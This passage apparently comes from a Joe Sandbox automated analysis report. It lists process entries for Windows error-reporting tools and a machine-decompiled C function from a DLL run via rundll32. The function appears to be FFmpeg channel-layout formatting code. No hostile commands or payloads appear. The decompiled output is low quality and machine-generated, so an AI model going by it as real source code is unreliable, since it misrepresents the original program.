                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6712 -s 652
                                                                    Imagebase:0x3c0000
                                                                    File size:434592 bytes
                                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:23
                                                                    Start time:01:59:18
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7044 -s 652
                                                                    Imagebase:0x3c0000
                                                                    File size:434592 bytes
                                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:24
                                                                    Start time:01:59:22
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\SysWOW64\wermgr.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\wermgr.exe
                                                                    Imagebase:0x1070000
                                                                    File size:191904 bytes
                                                                    MD5 hash:CCF15E662ED5CE77B5FF1A7AAE305233
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                      C-Code - Quality: 27%
                                                                      			E1000D4D0(void* __ebx, void* __edi, void* __esi) {
                                                                      				char _t142;
                                                                      				intOrPtr _t144;
                                                                      				signed int _t145;
                                                                      				signed int _t148;
                                                                      				char _t160;
                                                                      				signed int _t163;
                                                                      				signed int _t166;
                                                                      				unsigned int _t178;
                                                                      				signed int _t182;
                                                                      				char* _t191;
                                                                      				char _t192;
                                                                      				char* _t206;
                                                                      				void* _t211;
                                                                      				unsigned int _t227;
                                                                      				intOrPtr _t238;
                                                                      				intOrPtr _t241;
                                                                      				signed int _t243;
                                                                      				signed int _t250;
                                                                      				signed int _t272;
                                                                      				intOrPtr _t273;
                                                                      				char* _t280;
                                                                      				unsigned int _t284;
                                                                      				intOrPtr _t285;
                                                                      				signed int _t289;
                                                                      				signed int _t292;
                                                                      				void* _t293;
                                                                      				char* _t329;
                                                                      				unsigned int _t330;
                                                                      				unsigned int _t332;
                                                                      				signed int _t333;
                                                                      				signed int _t337;
                                                                      				unsigned int _t341;
                                                                      				unsigned int _t351;
                                                                      				char* _t353;
                                                                      				intOrPtr _t379;
                                                                      				char* _t380;
                                                                      				signed int _t381;
                                                                      				signed int _t382;
                                                                      				char* _t386;
                                                                      				unsigned int _t387;
                                                                      				signed int _t388;
                                                                      				char* _t390;
                                                                      				signed int _t395;
                                                                      				void* _t397;
                                                                      				signed int _t399;
                                                                      				signed int _t402;
                                                                      				void* _t403;
                                                                      				char _t420;
                                                                      				signed int _t421;
                                                                      				char* _t423;
                                                                      				signed int _t425;
                                                                      				char* _t426;
                                                                      				char* _t428;
                                                                      				void* _t431;
                                                                      				char** _t432;
                                                                      				char** _t434;
                                                                      				char** _t435;
                                                                      				intOrPtr* _t438;
                                                                      				void* _t440;
                                                                      
                                                                      				_push(__edi);
                                                                      				_push(__esi);
                                                                      				_push(__ebx);
                                                                      				_t432 = _t431 - 0x2c;
                                                                      				_t423 = _t432[0x10];
                                                                      				_t432[6] = _t432[0x11];
                                                                      				_t142 =  *_t423;
                                                                      				_t440 = _t142 - 2;
                                                                      				if(_t440 == 0) {
                                                                      					L60();
                                                                      					if(_t432[6] >= 0) {
                                                                      						goto L8;
                                                                      					} else {
                                                                      						goto L14;
                                                                      					}
                                                                      					goto L12;
                                                                      				} else {
                                                                      					if(_t440 > 0) {
                                                                      						if(_t142 != 3) {
                                                                      							_t144 = 0xffffffea;
                                                                      							goto L12;
                                                                      						} else {
                                                                      							_t191 = _t432[6];
                                                                      							_t434 =  &(_t432[0xb]);
                                                                      							_t353 = _t423;
                                                                      							_pop(_t273);
                                                                      							_pop(_t403);
                                                                      							_pop(_t389);
                                                                      							_pop(_t427);
                                                                      							_t428 = _t353;
                                                                      							_t390 = _t191;
                                                                      							_push(_t403);
                                                                      							_push(_t273);
                                                                      							_t435 = _t434 - 0x4c;
                                                                      							_t192 =  *_t353;
                                                                      							if(_t192 == 3) {
                                                                      								_t206 = _t428[4];
                                                                      								_t280 =  &(_t206[ !((((((_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) + ((((_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) >> 0x00000008) >> 0x00000010) + (((_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) + ((((_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) >> 0x00000008) & 0x0000003f) + (((((_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) + ((((_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[0xc] - (_t353[0xc] >> 
0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) >> 0x00000008) >> 0x00000010) + (((_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) + ((((_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) >> 0x00000008) & 0x0000003f))]);
                                                                      								goto L74;
                                                                      							} else {
                                                                      								_t332 = _t353[8];
                                                                      								if(_t192 != 2) {
                                                                      									_t435[5] = 0x29a;
                                                                      									_t435[1] = 0;
                                                                      									 *_t435 = 0;
                                                                      									_t435[4] = "libavutil/channel_layout.c";
                                                                      									_t435[3] = "channel_layout->order == AV_CHANNEL_ORDER_CUSTOM";
                                                                      									_t435[2] = "Assertion %s failed at %s:%d\n";
                                                                      									E10026560();
                                                                      									L100A06B8();
                                                                      									_t438 = _t435 - 0x41c;
                                                                      									 *((intOrPtr*)(_t438 + 0x418)) = _t273;
                                                                      									_t238 =  *((intOrPtr*)(_t438 + 0x424));
                                                                      									_t379 =  *((intOrPtr*)(_t438 + 0x428));
                                                                      									if(_t238 != 0 || _t379 == 0) {
                                                                      										 *((intOrPtr*)(_t438 + 8)) = _t379;
                                                                      										_t285 = _t438 + 0x10;
                                                                      										 *((intOrPtr*)(_t438 + 4)) = _t238;
                                                                      										 *_t438 = _t285;
                                                                      										L100089A0();
                                                                      										 *((intOrPtr*)(_t438 + 4)) = _t285;
                                                                      										 *_t438 =  *((intOrPtr*)(_t438 + 0x420));
                                                                      										_t241 = E1000D4D0(_t285, _t390, _t403);
                                                                      										if(_t241 >= 0) {
                                                                      											_t241 =  *((intOrPtr*)(_t438 + 0x14));
                                                                      										}
                                                                      									} else {
                                                                      										_t241 = 0xffffffea;
                                                                      									}
                                                                      									return _t241;
                                                                      								} else {
                                                                      									_t420 = _t353[4];
                                                                      									_t380 = 0;
                                                                      									_t280 = 0xffffffff;
                                                                      									if(_t420 > 0) {
                                                                      										do {
                                                                      											_t206 =  *_t332 - 0x400;
                                                                      											if(_t206 > 0x3ff) {
                                                                      												goto L67;
                                                                      											} else {
                                                                      												if(_t380 > 0) {
                                                                      													if( *((intOrPtr*)(_t332 - 0x18)) - 0x400 > 0x3ff || _t206 != _t380) {
                                                                      														goto L72;
                                                                      													} else {
                                                                      														goto L66;
                                                                      													}
                                                                      												} else {
                                                                      													if(_t206 > 0x3ff) {
                                                                      														goto L67;
                                                                      													} else {
                                                                      														if(_t206 == _t380) {
                                                                      															L66:
                                                                      															_t280 = _t380;
                                                                      															goto L67;
                                                                      														} else {
                                                                      															goto L72;
                                                                      														}
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      											goto L90;
                                                                      											L67:
                                                                      											_t380 =  &(_t380[1]);
                                                                      											_t332 = _t332 + 0x18;
                                                                      										} while (_t380 != _t420);
                                                                      										L74:
                                                                      										if(_t280 < 0) {
                                                                      											goto L72;
                                                                      										} else {
                                                                      											asm("pxor xmm0, xmm0");
                                                                      											asm("cvtsi2sd xmm0, ebx");
                                                                      											asm("sqrtsd xmm0, xmm0");
                                                                      											asm("cvttsd2si eax, xmm0");
                                                                      											_t406 =  &(_t206[1]) *  &(_t206[1]);
                                                                      											if(_t406 !=  &(_t280[1])) {
                                                                      												goto L72;
                                                                      											} else {
                                                                      												_t435[2] = _t206;
                                                                      												_t435[1] = "ambisonic %d";
                                                                      												 *_t435 = _t390;
                                                                      												L100089C0();
                                                                      												_t329 = _t428[4];
                                                                      												if(_t329 > _t406) {
                                                                      													_t211 = 0;
                                                                      													do {
                                                                      														 *((intOrPtr*)(_t435 + _t211 + 0x28)) = 0;
                                                                      														 *((intOrPtr*)(_t435 + _t211 + 0x2c)) = 0;
                                                                      														_t211 = _t211 + 8;
                                                                      													} while (_t211 < 0x18);
                                                                      													if( *_t428 == 3) {
                                                                      														_t330 = _t428[8];
                                                                      														_t435[0xa] = 1;
                                                                      														_t284 = _t428[0xc];
                                                                      														_t435[0xc] = _t330;
                                                                      														_t435[0xd] = _t284;
                                                                      														_t227 = (((_t284 - (_t284 >> 0x00000001 & 0x55555555) & 0x33333333) + (_t284 - (_t284 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t284 - (_t284 >> 0x00000001 & 0x55555555) & 0x33333333) + (_t284 - (_t284 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) + ((((_t284 - (_t284 >> 0x00000001 & 0x55555555) & 0x33333333) + (_t284 - (_t284 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t284 - (_t284 >> 0x00000001 & 0x55555555) & 0x33333333) + (_t284 - (_t284 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) >> 8);
                                                                      														_t406 = _t227 >> 0x10;
                                                                      														_t435[0xb] = ((((_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) + ((((_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) >> 0x00000008) + ((((_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) + ((((_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) >> 0x00000008) >> 0x00000010) & 0x0000003f) + (_t227 + (_t227 >> 0x00000010) & 0x0000003f);
                                                                      													} else {
                                                                      														_t284 = 2;
                                                                      														_t435[0xa] = 2;
                                                                      														_t435[0xb] = _t329 - _t406;
                                                                      														_t435[0xc] = _t428[8] + (_t406 + _t406 * 2) * 8;
                                                                      													}
                                                                      													 *_t435 = _t390;
                                                                      													_t435[2] = 1;
                                                                      													_t435[1] = 0x2b;
                                                                      													L10008D20();
                                                                      													_t435[1] = _t390;
                                                                      													 *_t435 =  &(_t435[0xa]);
                                                                      													E1000D4D0(_t284, _t390, _t406);
                                                                      												}
                                                                      												return 0;
                                                                      											}
                                                                      										}
                                                                      									} else {
                                                                      										L72:
                                                                      										return 0xffffffea;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						if(_t142 == 0) {
                                                                      							_t148 = _t423[4];
                                                                      							goto L59;
                                                                      						} else {
                                                                      							_t421 = _t423[8];
                                                                      							_t243 = 4;
                                                                      							_t333 = 0;
                                                                      							_t289 = _t423[0xc];
                                                                      							_t381 = 0;
                                                                      							while((_t333 ^ _t289 | _t243 ^ _t421) != 0) {
                                                                      								_t381 =  &(1[_t381]);
                                                                      								if(_t381 == 0x1f) {
                                                                      									L14:
                                                                      									_t145 = _t423[4];
                                                                      									if(_t145 != 0) {
                                                                      										_t432[2] = _t145;
                                                                      										_t432[1] = "%d channels (";
                                                                      										 *_t432 = _t432[6];
                                                                      										L100089C0();
                                                                      										_t395 = _t423[4];
                                                                      										if(_t395 > 0) {
                                                                      											_t425 = 0;
                                                                      											_t386 = _t423;
                                                                      											goto L19;
                                                                      											do {
                                                                      												do {
                                                                      													L19:
                                                                      													if(_t425 >= _t395) {
                                                                      														L57:
                                                                      														_t432[1] = 0x100b1acf;
                                                                      														 *_t432 = _t432[6];
                                                                      														L100089C0();
                                                                      														goto L24;
                                                                      													} else {
                                                                      														_t160 =  *_t386;
                                                                      														if(_t160 == 2) {
                                                                      															_t292 =  *(_t386[8] + (_t425 + _t425 * 2) * 8);
                                                                      															_t250 = _t292 - 0x400;
                                                                      															if(_t425 != 0) {
                                                                      																_t432[4] = _t292;
                                                                      																_t432[1] = 0x100b1acf;
                                                                      																 *_t432 = _t432[6];
                                                                      																L100089C0();
                                                                      																_t292 = _t432[4];
                                                                      															}
                                                                      															if(_t250 > 0x3ff) {
                                                                      																goto L53;
                                                                      															} else {
                                                                      																goto L51;
                                                                      															}
                                                                      														} else {
                                                                      															if(_t160 == 3) {
                                                                      																_t178 = _t386[8];
                                                                      																_t432[4] = _t178;
                                                                      																_t432[5] = _t386[0xc];
                                                                      																_t397 = _t395 - (((((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) >> 0x00000008) + ((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) >> 0x00000010) + (((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) >> 0x00000008) + ((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) & 0x0000003f) + ((((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) + (((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 
0x0f0f0f0f) >> 0x00000008) >> 0x00000010) + ((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) + (((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) >> 0x00000008) & 0x0000003f);
                                                                      																_t272 = _t425 - _t397;
                                                                      																if(_t425 >= _t397) {
                                                                      																	goto L32;
                                                                      																} else {
                                                                      																	_t250 = 0;
                                                                      																	if(_t425 == 0) {
                                                                      																		L51:
                                                                      																		_t432[2] = _t250;
                                                                      																		_t432[1] = "AMBI%d";
                                                                      																		 *_t432 = _t432[6];
                                                                      																		L100089C0();
                                                                      																	} else {
                                                                      																		_t250 = _t425;
                                                                      																		_t432[1] = 0x100b1acf;
                                                                      																		_t64 = _t425 + 0x400; // 0x401
                                                                      																		_t432[4] = _t64;
                                                                      																		 *_t432 = _t432[6];
                                                                      																		L100089C0();
                                                                      																		_t292 = _t432[4];
                                                                      																		if(_t425 <= 0x3ff) {
                                                                      																			goto L51;
                                                                      																		} else {
                                                                      																			goto L47;
                                                                      																		}
                                                                      																	}
                                                                      																}
                                                                      															} else {
                                                                      																if(_t160 == 1) {
                                                                      																	_t272 = _t425;
                                                                      																	_t432[4] = _t386[8];
                                                                      																	_t432[5] = _t386[0xc];
                                                                      																	L32:
                                                                      																	_t432[7] = _t425;
                                                                      																	_t182 = _t432[4];
                                                                      																	_t292 = 0;
                                                                      																	_t351 = _t432[5];
                                                                      																	_t426 = _t386;
                                                                      																	do {
                                                                      																		_t387 = _t351;
                                                                      																		_t399 = (_t387 << 0x00000020 | _t182) >> _t292;
                                                                      																		_t388 = _t387 >> _t292;
                                                                      																		if((_t292 & 0x00000020) != 0) {
                                                                      																			_t399 = _t388;
                                                                      																		}
                                                                      																		if((_t399 & 0x00000001) == 0) {
                                                                      																			goto L34;
                                                                      																		} else {
                                                                      																			_t49 = _t272 - 1; // 0x0
                                                                      																			_t402 = _t49;
                                                                      																			if(_t272 != 0) {
                                                                      																				_t272 = _t402;
                                                                      																				goto L34;
                                                                      																			} else {
                                                                      																				_t386 = _t426;
                                                                      																				_t425 = _t432[7];
                                                                      																				if(_t425 != 0) {
                                                                      																					_t432[4] = _t292;
                                                                      																					_t432[1] = 0x100b1acf;
                                                                      																					 *_t432 = _t432[6];
                                                                      																					L100089C0();
                                                                      																					_t292 = _t432[4];
                                                                      																					L53:
                                                                      																					if(_t292 <= 0x28) {
                                                                      																						goto L41;
                                                                      																					} else {
                                                                      																						if(_t292 != 0xffffffff) {
                                                                      																							goto L47;
                                                                      																						} else {
                                                                      																							goto L24;
                                                                      																						}
                                                                      																					}
                                                                      																				} else {
                                                                      																					if(_t292 > 0x28) {
                                                                      																						L47:
                                                                      																						_t432[2] = _t292;
                                                                      																						_t432[1] = "USR%d";
                                                                      																						 *_t432 = _t432[6];
                                                                      																						L100089C0();
                                                                      																					} else {
                                                                      																						L41:
                                                                      																						_t163 =  *(0x100b2280 + _t292 * 8);
                                                                      																						if(_t163 == 0) {
                                                                      																							goto L47;
                                                                      																						} else {
                                                                      																							_t432[2] = _t163;
                                                                      																							_t432[1] = "%s";
                                                                      																							 *_t432 = _t432[6];
                                                                      																							L100089C0();
                                                                      																						}
                                                                      																					}
                                                                      																				}
                                                                      																			}
                                                                      																		}
                                                                      																		goto L25;
                                                                      																		L34:
                                                                      																		_t292 =  &(1[_t292]);
                                                                      																	} while (_t292 != 0x40);
                                                                      																	_t386 = _t426;
                                                                      																	_t425 = _t432[7];
                                                                      																	if(_t425 == 0) {
                                                                      																		goto L24;
                                                                      																	} else {
                                                                      																		goto L57;
                                                                      																	}
                                                                      																	goto L29;
                                                                      																} else {
                                                                      																	if(_t425 != 0) {
                                                                      																		goto L57;
                                                                      																	}
                                                                      																	L24:
                                                                      																	_t432[1] = "NONE";
                                                                      																	 *_t432 = _t432[6];
                                                                      																	L100089C0();
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													}
                                                                      													L25:
                                                                      													if( *_t386 != 2) {
                                                                      														goto L18;
                                                                      													} else {
                                                                      														_t341 = _t386[8];
                                                                      														_t166 = _t425 + _t425 * 2;
                                                                      														_t293 = _t341 + _t166 * 8;
                                                                      														if( *((char*)(_t341 + 4 + _t166 * 8)) == 0) {
                                                                      															goto L18;
                                                                      														} else {
                                                                      															goto L27;
                                                                      														}
                                                                      													}
                                                                      													goto L29;
                                                                      													L27:
                                                                      													_t425 =  &(1[_t425]);
                                                                      													_t432[2] = _t293 + 4;
                                                                      													_t432[1] = "@%s";
                                                                      													 *_t432 = _t432[6];
                                                                      													L100089C0();
                                                                      													_t395 = _t386[4];
                                                                      												} while (_t395 > _t425);
                                                                      												goto L29;
                                                                      												L18:
                                                                      												_t395 = _t386[4];
                                                                      												_t425 =  &(1[_t425]);
                                                                      											} while (_t395 > _t425);
                                                                      										}
                                                                      										L29:
                                                                      										if(_t395 == 0) {
                                                                      											goto L15;
                                                                      										} else {
                                                                      											_t432[1] = 0x100b1ad1;
                                                                      											 *_t432 = _t432[6];
                                                                      											L100089C0();
                                                                      											_t144 = 0;
                                                                      										}
                                                                      									} else {
                                                                      										L15:
                                                                      										_t148 = 0;
                                                                      										L59:
                                                                      										_t432[2] = _t148;
                                                                      										_t432[1] = "%d channels";
                                                                      										 *_t432 = _t432[6];
                                                                      										L100089C0();
                                                                      										_t144 = 0;
                                                                      									}
                                                                      								} else {
                                                                      									_t337 = _t381 << 5;
                                                                      									_t6 = _t337 + 0x100b1c90; // 0x0
                                                                      									_t243 =  *_t6;
                                                                      									_t7 = _t337 + 0x100b1c94; // 0x0
                                                                      									_t333 =  *_t7;
                                                                      									continue;
                                                                      								}
                                                                      								goto L12;
                                                                      							}
                                                                      							_t382 = _t381 << 5;
                                                                      							_t432[1] = "%s";
                                                                      							_t9 = _t382 + 0x100b1c80; // 0x100b1abb
                                                                      							_t432[2] =  *_t9;
                                                                      							 *_t432 = _t432[6];
                                                                      							L100089C0();
                                                                      							L8:
                                                                      							_t144 = 0;
                                                                      						}
                                                                      						L12:
                                                                      						return _t144;
                                                                      					}
                                                                      				}
                                                                      				L90:
                                                                      			}
                                                                      0x1000d814
                                                                      0x1000d6f2
                                                                      0x1000d6f2
                                                                      0x1000d6f2
                                                                      0x1000d6fb
                                                                      0x00000000
                                                                      0x1000d701
                                                                      0x1000d701
                                                                      0x1000d70a
                                                                      0x1000d712
                                                                      0x1000d715
                                                                      0x1000d715
                                                                      0x1000d6fb
                                                                      0x1000d6ec
                                                                      0x1000d6e3
                                                                      0x1000d6d9
                                                                      0x00000000
                                                                      0x1000d6b2
                                                                      0x1000d6b2
                                                                      0x1000d6b3
                                                                      0x1000d8b0
                                                                      0x1000d8b2
                                                                      0x1000d8b8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1000d5ff
                                                                      0x1000d601
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1000d607
                                                                      0x1000d610
                                                                      0x1000d614
                                                                      0x1000d617
                                                                      0x1000d617
                                                                      0x1000d5f9
                                                                      0x1000d5f2
                                                                      0x1000d5e9
                                                                      0x1000d620
                                                                      0x1000d623
                                                                      0x00000000
                                                                      0x1000d625
                                                                      0x1000d625
                                                                      0x1000d628
                                                                      0x1000d631
                                                                      0x1000d634
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1000d634
                                                                      0x00000000
                                                                      0x1000d636
                                                                      0x1000d63d
                                                                      0x1000d63e
                                                                      0x1000d647
                                                                      0x1000d64b
                                                                      0x1000d64e
                                                                      0x1000d653
                                                                      0x1000d656
                                                                      0x00000000
                                                                      0x1000d5d0
                                                                      0x1000d5d0
                                                                      0x1000d5d3
                                                                      0x1000d5d4
                                                                      0x1000d5dc
                                                                      0x1000d660
                                                                      0x1000d662
                                                                      0x00000000
                                                                      0x1000d668
                                                                      0x1000d671
                                                                      0x1000d675
                                                                      0x1000d678
                                                                      0x1000d67d
                                                                      0x1000d67d
                                                                      0x1000d596
                                                                      0x1000d596
                                                                      0x1000d596
                                                                      0x1000d8e3
                                                                      0x1000d8e3
                                                                      0x1000d8ec
                                                                      0x1000d8f4
                                                                      0x1000d8f7
                                                                      0x1000d8fc
                                                                      0x1000d8fc
                                                                      0x1000d516
                                                                      0x1000d518
                                                                      0x1000d51b
                                                                      0x1000d51b
                                                                      0x1000d521
                                                                      0x1000d521
                                                                      0x00000000
                                                                      0x1000d521
                                                                      0x00000000
                                                                      0x1000d514
                                                                      0x1000d52f
                                                                      0x1000d537
                                                                      0x1000d53b
                                                                      0x1000d541
                                                                      0x1000d549
                                                                      0x1000d54c
                                                                      0x1000d551
                                                                      0x1000d551
                                                                      0x1000d551
                                                                      0x1000d575
                                                                      0x1000d57c
                                                                      0x1000d57c
                                                                      0x1000d4ef
                                                                      0x00000000

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_bprintf
